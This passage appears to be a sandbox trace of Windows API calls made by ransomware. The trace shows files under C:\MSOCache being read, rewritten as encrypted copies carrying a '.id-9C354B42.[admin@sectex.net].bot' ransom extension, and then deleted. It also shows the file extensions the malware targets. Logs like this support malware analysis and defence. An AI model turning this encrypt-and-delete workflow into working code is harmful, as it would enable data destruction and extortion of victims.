	[0033.456] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 0x2020
	[0033.457] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.457] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.457] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.457] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.457] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0033.457] GetLastError () returned 0x0
	[0033.457] ReadFile (in: hFile=0x190, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0xc72, lpOverlapped=0x0) returned 1
	[0033.485] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xc80, lpOverlapped=0x0) returned 1
	[0033.486] ReadFile (in: hFile=0x190, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.486] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0033.486] SetEndOfFile (hFile=0x194) returned 1
	[0033.486] CloseHandle (hObject=0x194) returned 1
	[0033.487] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.487] SetEndOfFile (hFile=0x190) returned 1
	[0033.488] CloseHandle (hObject=0x190) returned 1
	[0033.488] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.488] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 1
	[0033.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77
	[0033.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77
	[0033.489] lstrlenW (lpString=".doc") returned 4
	[0033.489] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.489] lstrlenW (lpString=".docx") returned 5
	[0033.489] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.489] lstrlenW (lpString=".pdf") returned 4
	[0033.489] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.489] lstrlenW (lpString=".xls") returned 4
	[0033.489] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.489] lstrlenW (lpString=".xlsx") returned 5
	[0033.489] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.489] lstrlenW (lpString=".ppt") returned 4
	[0033.489] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77
	[0033.489] lstrlenW (lpString=".zip") returned 4
	[0033.489] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.489] lstrlenW (lpString=".rar") returned 4
	[0033.489] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.489] lstrlenW (lpString=".bz2") returned 4
	[0033.489] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.489] lstrlenW (lpString=".7z") returned 3
	[0033.489] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77
	[0033.489] lstrlenW (lpString=".dbf") returned 4
	[0033.489] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77
	[0033.489] lstrlenW (lpString=".1cd") returned 4
	[0033.489] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77
	[0033.489] lstrlenW (lpString=".jpg") returned 4
	[0033.490] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77
	[0033.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77
	[0033.490] lstrlenW (lpString=".doc") returned 4
	[0033.490] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.490] lstrlenW (lpString=".docx") returned 5
	[0033.490] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.490] lstrlenW (lpString=".pdf") returned 4
	[0033.490] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.490] lstrlenW (lpString=".xls") returned 4
	[0033.490] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.490] lstrlenW (lpString=".xlsx") returned 5
	[0033.490] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.490] lstrlenW (lpString=".ppt") returned 4
	[0033.490] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77
	[0033.490] lstrlenW (lpString=".zip") returned 4
	[0033.490] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.490] lstrlenW (lpString=".rar") returned 4
	[0033.490] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.490] lstrlenW (lpString=".bz2") returned 4
	[0033.490] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.490] lstrlenW (lpString=".7z") returned 3
	[0033.490] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77
	[0033.490] lstrlenW (lpString=".dbf") returned 4
	[0033.490] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77
	[0033.490] lstrlenW (lpString=".1cd") returned 4
	[0033.490] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 77
	[0033.490] lstrlenW (lpString=".jpg") returned 4
	[0033.490] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.491] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.491] lstrlenW (lpString="Setup.xml") returned 9
	[0033.491] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.491] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=4207) returned 1
	[0033.491] CloseHandle (hObject=0x190) returned 1
	[0033.491] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0033.491] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.491] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.491] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.491] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.491] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0033.492] GetLastError () returned 0x0
	[0033.492] ReadFile (in: hFile=0x190, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x106f, lpOverlapped=0x0) returned 1
	[0033.508] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x1070, lpOverlapped=0x0) returned 1
	[0033.509] ReadFile (in: hFile=0x190, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.509] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0033.509] SetEndOfFile (hFile=0x194) returned 1
	[0033.510] CloseHandle (hObject=0x194) returned 1
	[0033.510] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.510] SetEndOfFile (hFile=0x190) returned 1
	[0033.511] CloseHandle (hObject=0x190) returned 1
	[0033.511] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.512] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0033.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.512] lstrlenW (lpString=".doc") returned 4
	[0033.512] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.512] lstrlenW (lpString=".docx") returned 5
	[0033.512] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.512] lstrlenW (lpString=".pdf") returned 4
	[0033.512] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.512] lstrlenW (lpString=".xls") returned 4
	[0033.512] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.512] lstrlenW (lpString=".xlsx") returned 5
	[0033.512] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.512] lstrlenW (lpString=".ppt") returned 4
	[0033.512] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.512] lstrlenW (lpString=".zip") returned 4
	[0033.512] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.512] lstrlenW (lpString=".rar") returned 4
	[0033.512] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.512] lstrlenW (lpString=".bz2") returned 4
	[0033.512] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.512] lstrlenW (lpString=".7z") returned 3
	[0033.512] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.512] lstrlenW (lpString=".dbf") returned 4
	[0033.512] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.512] lstrlenW (lpString=".1cd") returned 4
	[0033.513] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.513] lstrlenW (lpString=".jpg") returned 4
	[0033.513] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.513] lstrlenW (lpString=".doc") returned 4
	[0033.513] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.513] lstrlenW (lpString=".docx") returned 5
	[0033.513] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.513] lstrlenW (lpString=".pdf") returned 4
	[0033.513] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.513] lstrlenW (lpString=".xls") returned 4
	[0033.513] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.513] lstrlenW (lpString=".xlsx") returned 5
	[0033.513] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.513] lstrlenW (lpString=".ppt") returned 4
	[0033.513] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.513] lstrlenW (lpString=".zip") returned 4
	[0033.513] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.513] lstrlenW (lpString=".rar") returned 4
	[0033.513] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.513] lstrlenW (lpString=".bz2") returned 4
	[0033.513] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.513] lstrlenW (lpString=".7z") returned 3
	[0033.513] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.513] lstrlenW (lpString=".dbf") returned 4
	[0033.513] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.513] lstrlenW (lpString=".1cd") returned 4
	[0033.513] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.514] lstrlenW (lpString=".jpg") returned 4
	[0033.514] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.514] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.514] lstrlenW (lpString="Setup.xml") returned 9
	[0033.514] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.514] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2424) returned 1
	[0033.514] CloseHandle (hObject=0x190) returned 1
	[0033.514] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0033.514] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.514] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.514] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.514] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.515] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0033.523] GetLastError () returned 0x0
	[0033.523] ReadFile (in: hFile=0x190, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x978, lpOverlapped=0x0) returned 1
	[0033.547] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x980, lpOverlapped=0x0) returned 1
	[0033.548] ReadFile (in: hFile=0x190, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.548] WriteFile (in: hFile=0x194, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0033.548] SetEndOfFile (hFile=0x194) returned 1
	[0033.548] CloseHandle (hObject=0x194) returned 1
	[0033.549] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.549] SetEndOfFile (hFile=0x190) returned 1
	[0033.550] CloseHandle (hObject=0x190) returned 1
	[0033.550] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.550] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0033.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.550] lstrlenW (lpString=".doc") returned 4
	[0033.550] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.550] lstrlenW (lpString=".docx") returned 5
	[0033.550] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.550] lstrlenW (lpString=".pdf") returned 4
	[0033.550] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.551] lstrlenW (lpString=".xls") returned 4
	[0033.551] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.551] lstrlenW (lpString=".xlsx") returned 5
	[0033.551] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.551] lstrlenW (lpString=".ppt") returned 4
	[0033.551] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.551] lstrlenW (lpString=".zip") returned 4
	[0033.551] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.551] lstrlenW (lpString=".rar") returned 4
	[0033.551] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.551] lstrlenW (lpString=".bz2") returned 4
	[0033.551] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.551] lstrlenW (lpString=".7z") returned 3
	[0033.551] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.551] lstrlenW (lpString=".dbf") returned 4
	[0033.551] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.551] lstrlenW (lpString=".1cd") returned 4
	[0033.551] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.551] lstrlenW (lpString=".jpg") returned 4
	[0033.551] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.551] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.551] lstrlenW (lpString=".doc") returned 4
	[0033.551] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.551] lstrlenW (lpString=".docx") returned 5
	[0033.551] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.551] lstrlenW (lpString=".pdf") returned 4
	[0033.551] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.551] lstrlenW (lpString=".xls") returned 4
	[0033.551] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.552] lstrlenW (lpString=".xlsx") returned 5
	[0033.552] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.552] lstrlenW (lpString=".ppt") returned 4
	[0033.552] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.552] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.552] lstrlenW (lpString=".zip") returned 4
	[0033.552] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.552] lstrlenW (lpString=".rar") returned 4
	[0033.552] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.552] lstrlenW (lpString=".bz2") returned 4
	[0033.552] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.552] lstrlenW (lpString=".7z") returned 3
	[0033.552] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.552] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.552] lstrlenW (lpString=".dbf") returned 4
	[0033.552] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.552] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.552] lstrlenW (lpString=".1cd") returned 4
	[0033.552] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.552] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.552] lstrlenW (lpString=".jpg") returned 4
	[0033.552] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.552] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.552] lstrlenW (lpString="WordMUI.xml") returned 11
